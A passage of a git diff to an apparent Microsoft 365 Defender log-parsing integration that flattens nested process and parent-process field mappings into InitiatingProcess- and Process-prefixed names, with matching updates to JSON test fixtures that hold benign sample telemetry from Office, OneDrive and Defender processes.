           process.command_line: "{{json_event.message.properties.ProcessCommandLine}}"
           process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}"
-          action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
-          action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
-          action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
-          action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
-          action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
-          action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
-          action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
-          action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
-          action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
-          action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
-          action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
-          action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
-          action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
-          action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
-          action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
-          action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
-          action.properties.process.parent.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
-          action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
-          action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
-          action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
+          action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
+          action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
+          action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
+          action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
+          action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
+          action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
+          action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
+          action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
+          action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+          action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+          action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+          action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+          action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
+          action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+          action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+          action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+          action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
+          action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
+          action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
+          action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
 
       - set:
           process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
@@ -418,7 +418,6 @@ stages:
           event.dataset: "device_events"
           event.category: ["host"]
           action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}"
-          #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
   set_device_file_certificate_info_fields:
     actions:
       - set:
@@ -531,15 +530,6 @@ stages:
       - set:
           event.dataset: "device_process_events"
           event.category: ["process"]
-          #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
-          #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
-          #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
-          #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
-          #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
-          #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
-          #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
-          #action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
-          #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
   set_device_registry_events_fields:
     actions:
       - set:
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json
index 17cad5081..ca708b0ed 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json
@@ -16,18 +16,16 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-          "FileSize": 14687048,
-          "LogonId": "121834210",
-          "VersionInfoCompanyName": "Google",
-          "VersionInfoFileDescription": "Software Reporter Tool",
-          "VersionInfoInternalFileName": "software_reporter_tool_exe",
-          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
-          "VersionInfoProductName": "Software Reporter Tool",
-          "VersionInfoProductVersion": "102.286.200"
-        }
+        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+        "InitiatingProcessFileSize": 14687048,
+        "InitiatingProcessLogonId": "121834210",
+        "InitiatingProcessVersionInfoCompanyName": "Google",
+        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
index 413d002c1..2655cb069 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
@@ -23,18 +23,16 @@
     "action": {
       "properties": {
         "AccountSid": "S-1-2-3",
-        "process": {
-          "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
-          "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
-          "FileSize": 3316224,
-          "LogonId": "5223047",
-          "VersionInfoCompanyName": "Test Corporation",
-          "VersionInfoFileDescription": "Browser EXE",
-          "VersionInfoInternalFileName": "Browser.EXE",
-          "VersionInfoOriginalFileName": "Browser.EXE",
-          "VersionInfoProductName": "Test Product",
-          "VersionInfoProductVersion": "1, 0, 0, 1"
-        }
+        "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
+        "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
+        "InitiatingProcessFileSize": 3316224,
+        "InitiatingProcessLogonId": "5223047",
+        "InitiatingProcessVersionInfoCompanyName": "Test Corporation",
+        "InitiatingProcessVersionInfoFileDescription": "Browser EXE",
+        "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE",
+        "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE",
+        "InitiatingProcessVersionInfoProductName": "Test Product",
+        "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1"
       },
       "type": "SensitiveFileRead"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
index 4964dae1f..1f1351d52 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
@@ -16,9 +16,7 @@
     "@timestamp": "2024-10-22T15:09:08.851712Z",
     "action": {
       "properties": {
-        "process": {
-          "LogonId": "0"
-        }
+        "InitiatingProcessLogonId": "0"
       },
       "type": "ScriptContent"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
index c34cefa50..3292ed6fe 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
@@ -22,18 +22,16 @@
     "@timestamp": "2024-11-12T10:19:26.502777Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd",
-          "CommandLine": "\"OUTLOOK.EXE\" ",
-          "FileSize": 44152968,
-          "LogonId": "389220681",
-          "VersionInfoCompanyName": "Microsoft Corporation",
-          "VersionInfoFileDescription": "Microsoft Outlook",
-          "VersionInfoInternalFileName": "Outlook",
-          "VersionInfoOriginalFileName": "Outlook.exe",
-          "VersionInfoProductName": "Microsoft Outlook",
-          "VersionInfoProductVersion": "16.0.17928.20216"
-        }
+        "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd",
+        "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ",
+        "InitiatingProcessFileSize": 44152968,
+        "InitiatingProcessLogonId": "389220681",
+        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook",
+        "InitiatingProcessVersionInfoInternalFileName": "Outlook",
+        "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe",
+        "InitiatingProcessVersionInfoProductName": "Microsoft Outlook",
+        "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216"
       },
       "type": "GetClipboardData"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
index ea0ddb0df..fea26327a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
@@ -22,18 +22,16 @@
     "@timestamp": "2024-11-12T10:15:59.550882Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789",
-          "CommandLine": "powershell.exe",
-          "FileSize": 450560,
-          "LogonId": "398124703",
-          "VersionInfoCompanyName": "Microsoft Corporation",
-          "VersionInfoFileDescription": "Windows PowerShell",
-          "VersionInfoInternalFileName": "POWERSHELL",
-          "VersionInfoOriginalFileName": "PowerShell.EXE",
-          "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
-          "VersionInfoProductVersion": "10.0.22621.3085"
-        }
+        "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789",
+        "InitiatingProcessCommandLine": "powershell.exe",
+        "InitiatingProcessFileSize": 450560,
+        "InitiatingProcessLogonId": "398124703",
+        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell",
+        "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL",
+        "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE",
+        "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+        "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085"
       },
       "type": "PowerShellCommand"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
index 48696c644..672754009 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
@@ -22,18 +22,16 @@
     "@timestamp": "2024-11-12T10:17:23.330722Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
-          "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
-          "FileSize": 1621656,
-          "LogonId": "8066492",
-          "VersionInfoCompanyName": "Microsoft Corporation",
-          "VersionInfoFileDescription": "Microsoft Word",
-          "VersionInfoInternalFileName": "WinWord",
-          "VersionInfoOriginalFileName": "WinWord.exe",
-          "VersionInfoProductName": "Microsoft Office",
-          "VersionInfoProductVersion": "16.0.17928.20216"
-        }
+        "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
+        "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+        "InitiatingProcessFileSize": 1621656,
+        "InitiatingProcessLogonId": "8066492",
+        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "InitiatingProcessVersionInfoFileDescription": "Microsoft Word",
+        "InitiatingProcessVersionInfoInternalFileName": "WinWord",
+        "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe",
+        "InitiatingProcessVersionInfoProductName": "Microsoft Office",
+        "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216"
       },
       "type": "ShellLinkCreateFileEvent"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
index 94b70858f..7428190cf 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
@@ -16,19 +16,17 @@
     "@timestamp": "2022-09-01T07:46:42.468408Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-          "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
-          "FileSize": 56824728,
-          "IntegrityLevel": "Medium",
-          "TokenElevation": "TokenElevationTypeDefault",
-          "VersionInfoCompanyName": "Microsoft Corporation",
-          "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
-          "VersionInfoInternalFileName": "OneDriveSetup.exe",
-          "VersionInfoOriginalFileName": "OneDriveSetup.exe",
-          "VersionInfoProductName": "Microsoft OneDrive",
-          "VersionInfoProductVersion": "22.166.0807.0002"
-        }
+        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+        "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
+        "InitiatingProcessFileSize": 56824728,
+        "InitiatingProcessIntegrityLevel": "Medium",
+        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
+        "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe",
+        "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe",
+        "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive",
+        "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002"
       },
       "type": "FileDeleted"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
index 1a9daafcd..73d8718f8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
@@ -22,19 +22,17 @@
     "@timestamp": "2024-11-08T14:38:51.904876Z",
     "action": {
       "properties": {
-        "RequestAccountSid": "S-1-2-3",
-        "process": {
-          "CommandLine": "commandexec.exe /V",
-          "FileSize": 176128,
-          "IntegrityLevel": "System",
-          "TokenElevation": "TokenElevationTypeDefault",
-          "VersionInfoCompanyName": "Microsoft Corporation",
-          "VersionInfoFileDescription": "Windows\u00ae installer",
-          "VersionInfoInternalFileName": "commandexec",
-          "VersionInfoOriginalFileName": "commandexec.exe",
-          "VersionInfoProductName": "Windows Installer - Unicode",
-          "VersionInfoProductVersion": "5.0.22621.3880"
-        }
+        "InitiatingProcessCommandLine": "commandexec.exe /V",
+        "InitiatingProcessFileSize": 176128,
+        "InitiatingProcessIntegrityLevel": "System",
+        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer",
+        "InitiatingProcessVersionInfoInternalFileName": "commandexec",
+        "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe",
+        "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode",
+        "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880",
+        "RequestAccountSid": "S-1-2-3"
       },
       "type": "FileCreated"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
index 04559806a..497faa7bf 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
@@ -16,12 +16,10 @@
     "@timestamp": "2022-09-01T07:47:58.616127Z",
     "action": {
       "properties": {
-        "process": {
-          "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
-          "FileSize": 66560,
-          "IntegrityLevel": "Medium",
-          "TokenElevation": "TokenElevationTypeDefault"
-        }
+        "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
+        "InitiatingProcessFileSize": 66560,
+        "InitiatingProcessIntegrityLevel": "Medium",
+        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault"
       },
       "type": "ImageLoaded"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
index e70edf395..15dc7a41b 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
@@ -17,11 +17,9 @@
     "action": {
       "properties": {
         "AccountSid": "S-1-1-11-1-1",
+        "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession",
         "LogonId": "111111",
-        "LogonType": "Interactive",
-        "process": {
-          "CommandLine": "WinLogon.exe -SpecialSession"
-        }
+        "LogonType": "Interactive"
       },
       "type": "LogonSuccess"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
index 75ab306b8..348f76f4e 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
@@ -16,21 +16,19 @@
     "@timestamp": "2023-01-04T14:05:32.314862Z",
     "action": {
       "properties": {
+        "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
+        "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
+        "InitiatingProcessFileSize": 63984520,
+        "InitiatingProcessIntegrityLevel": "Medium",
+        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel",
+        "InitiatingProcessVersionInfoInternalFileName": "Excel",
+        "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe",
+        "InitiatingProcessVersionInfoProductName": "Microsoft Office",
+        "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538",
         "LocalIPType": "Private",
-        "RemoteIPType": "Public",
-        "process": {
-          "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
-          "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
-          "FileSize": 63984520,
-          "IntegrityLevel": "Medium",
-          "TokenElevation": "TokenElevationTypeDefault",
-          "VersionInfoCompanyName": "Microsoft Corporation",
-          "VersionInfoFileDescription": "Microsoft Excel",
-          "VersionInfoInternalFileName": "Excel",
-          "VersionInfoOriginalFileName": "Excel.exe",
-          "VersionInfoProductName": "Microsoft Office",
-          "VersionInfoProductVersion": "16.0.15601.20538"
-        }
+        "RemoteIPType": "Public"
       },
       "type": "ConnectionSuccess"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
index 3847a138b..5a90081c8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
@@ -17,30 +17,26 @@
     "action": {
       "properties": {
         "AccountSid": "S-1-1-11",
+        "InitiatingProcessCommandLine": "\"MsMpEng.exe\"",
+        "InitiatingProcessFileSize": 133576,
+        "InitiatingProcessIntegrityLevel": "System",
+        "InitiatingProcessLogonId": "999",
+        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable",
+        "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe",
+        "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe",
+        "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+        "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6",
         "LogonId": "999",
-        "process": {
-          "IntegrityLevel": "System",
-          "TokenElevation": "TokenElevationTypeDefault",
-          "VersionInfoCompanyName": "Microsoft Corporation",
-          "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility",
-          "VersionInfoInternalFileName": "MpCmdRun",
-          "VersionInfoOriginalFileName": "MpCmdRun.exe",
-          "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
-          "VersionInfoProductVersion": "4.18.2301.6",
-          "parent": {
-            "CommandLine": "\"MsMpEng.exe\"",
-            "FileSize": 133576,
-            "IntegrityLevel": "System",
-            "LogonId": "999",
-            "TokenElevation": "TokenElevationTypeDefault",
-            "VersionInfoCompanyName": "Microsoft Corporation",
-            "VersionInfoFileDescription": "Antimalware Service Executable",
-            "VersionInfoInternalFileName": "MsMpEng.exe",
-            "VersionInfoOriginalFileName": "MsMpEng.exe",
-            "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
-            "VersionInfoProductVersion": "4.18.2301.6"
-          }
-        }
+        "ProcessIntegrityLevel": "System",
+        "ProcessTokenElevation": "TokenElevationTypeDefault",
+        "ProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility",
+        "ProcessVersionInfoInternalFileName": "MpCmdRun",
+        "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe",
+        "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+        "ProcessVersionInfoProductVersion": "4.18.2301.6"
       },
       "type": "ProcessCreated"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index cac1e9791..cab75fb0a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
@@ -23,30 +23,26 @@
     "action": {
       "properties": {
         "AccountSid": "S-1-2-3",
+        "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
+        "InitiatingProcessFileSize": 145408,
+        "InitiatingProcessIntegrityLevel": "System",
+        "InitiatingProcessLogonId": "999",
+        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer",
+        "InitiatingProcessVersionInfoInternalFileName": "file",
+        "InitiatingProcessVersionInfoOriginalFileName": "file.exe",
+        "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode",
+        "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880",
         "LogonId": "999",
-        "process": {
-          "IntegrityLevel": "System",
-          "TokenElevation": "TokenElevationTypeDefault",
-          "VersionInfoCompanyName": "Microsoft Corporation",
-          "VersionInfoFileDescription": "Network Command Shell",
-          "VersionInfoInternalFileName": "processcommand.exe",
-          "VersionInfoOriginalFileName": "processcommand.exe",
-          "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
-          "VersionInfoProductVersion": "10.0.22621.1",
-          "parent": {
-            "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
-            "FileSize": 145408,
-            "IntegrityLevel": "System",
-            "LogonId": "999",
-            "TokenElevation": "TokenElevationTypeDefault",
-            "VersionInfoCompanyName": "Microsoft Corporation",
-            "VersionInfoFileDescription": "Windows\u00ae installer",
-            "VersionInfoInternalFileName": "file",
-            "VersionInfoOriginalFileName": "file.exe",
-            "VersionInfoProductName": "Windows Installer - Unicode",
-            "VersionInfoProductVersion": "5.0.22621.3880"
-          }
-        }
+        "ProcessIntegrityLevel": "System",
+        "ProcessTokenElevation": "TokenElevationTypeDefault",
+        "ProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "ProcessVersionInfoFileDescription": "Network Command Shell",
+        "ProcessVersionInfoInternalFileName": "processcommand.exe",
+        "ProcessVersionInfoOriginalFileName": "processcommand.exe",
+        "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+        "ProcessVersionInfoProductVersion": "10.0.22621.1"
       },
       "type": "ProcessCreated"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
index 212f23549..3fe0d2cf8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
@@ -16,19 +16,17 @@
     "@timestamp": "2023-01-04T14:35:20.616193Z",
     "action": {
       "properties": {
-        "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements",
-        "process": {
-          "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
-          "FileSize": 445440,
-          "IntegrityLevel": "System",
-          "TokenElevation": "TokenElevationTypeDefault",
-          "VersionInfoCompanyName": "Microsoft Corporation",
-          "VersionInfoFileDescription": "Host Process for OMA-DM Client",
-          "VersionInfoInternalFileName": "omadmclient",
-          "VersionInfoOriginalFileName": "omadmclient.exe",
-          "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
-          "VersionInfoProductVersion": "10.0.19041.2193"
-        }
+        "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
+        "InitiatingProcessFileSize": 445440,
+        "InitiatingProcessIntegrityLevel": "System",
